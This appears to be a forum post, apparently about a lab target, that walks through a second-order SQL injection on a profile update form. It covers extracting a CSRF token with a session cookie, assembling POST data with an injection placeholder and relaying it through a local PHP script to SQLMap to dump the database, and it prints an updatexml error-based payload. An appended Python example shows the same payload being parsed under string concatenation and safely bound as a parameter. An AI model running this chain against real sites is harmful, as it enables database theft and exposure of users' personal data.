blog.terahost.exam

I first need to send a GET request to this URL:

    http://me.terahost.exam/profile

Use this as the cookie:

    Cookie: _sid_=4g63ah9pvms340pvinbhdk60j0

Once the request is sent, the following HTML code will be available in the response. I need the CSRF token from it. In this request it is:

    b6d67a24906e8a8541291882f81d31ca

Just store it in a variable.

Next, use the token in the update form for the SQL injection:

    http://me.terahost.exam/update-user

Use the same cookie:

    Cookie: _sid_=4g63ah9pvms340pvinbhdk60j0

POST data:

    "name=1&surname=1&email=1%401.com&street_address=8850+Egestas+Ave&city=Berlin" . $INJECTION . "&zip=29977-647&iban=GT33211377800379210569053628&password=&uID=500&acdt67gshfuiuasfsg=" . $TOKEN;

Please note the two variables: $INJECTION is the value of $_GET['injection'] supplied by the user, and $TOKEN is the extracted CSRF token, placed at the end of the POST data.

In this way we can perform the SQL injection through our script and pass it to SQLMap. My goal is to dump the database using SQLMap through this second-order injection.

    localhost/ourscript.php?injection=' * updatexml(1,concat(0x7e,(select(schema()))),0) *'
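
An added defensive example, not part of the original post: it assumes the update-user handler builds its UPDATE statement by string concatenation, and shows the page's city value being parsed as SQL in that form and stored as inert text once it is bound as a parameter. Python's sqlite3 stands in for the real database; the table layout and function names are hypothetical.

```python
import sqlite3

# Constructed sample: the city value from the page's POST data with the page's
# payload in the $INJECTION position.
CITY = "Berlin' * updatexml(1,concat(0x7e,(select(schema()))),0) *'"


def make_db():
    """In-memory stand-in for the application's user table (hypothetical layout)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, city TEXT)")
    db.execute("INSERT INTO users (id, city) VALUES (500, 'Berlin')")
    return db


def update_city_concat(db, uid, city):
    """Assumed vulnerable pattern: the form value is pasted into the SQL text."""
    sql = "UPDATE users SET city = '" + city + "' WHERE id = " + str(int(uid))
    try:
        db.execute(sql)
        return "executed"
    except sqlite3.OperationalError as exc:
        # SQLite has no updatexml(), so the attempt surfaces as an error here.
        # The error itself proves the input was treated as an expression, not data.
        return "parsed as SQL: " + str(exc)


def update_city_bound(db, uid, city):
    """Hardened pattern: the value travels as a bound parameter, never as SQL text."""
    db.execute("UPDATE users SET city = ? WHERE id = ?", (city, int(uid)))
    row = db.execute("SELECT city FROM users WHERE id = ?", (int(uid),)).fetchone()
    return row[0]


if __name__ == "__main__":
    db = make_db()
    print(update_city_concat(db, 500, CITY))
    print(repr(update_city_bound(db, 500, CITY)))
```

The CSRF token in the form only ties the request to a session; it does nothing about how the handler treats the field values, which is why the fix belongs in the query construction.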